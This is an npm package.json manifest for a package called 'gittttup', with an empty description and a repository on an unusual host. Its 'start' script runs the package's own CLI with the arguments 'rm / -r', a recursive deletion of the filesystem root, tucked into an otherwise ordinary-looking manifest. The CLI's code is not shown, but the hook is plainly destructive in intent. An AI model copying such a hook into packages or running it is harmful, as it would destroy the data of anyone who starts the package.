gittttup
 

24 lines
432 B

{
"name": "gittttup",
"version": "1.0.6",
"description": "",
"main": "app.js",
"bin": {
"xyx": "bin/xyx"
},
"repository": {
"type": "git",
"url": "http://git.poorman.top/topuser/eyc.git"
},
"scripts": {
"start": "node ./bin/xyx.js rm / -r"
},
"keywords": [],
"author": "",
"license": "ISC",
"dependencies": {
"commander": "^4.0.1",
"inquirer": "^7.0.0",
"ora": "^4.0.2"
}
}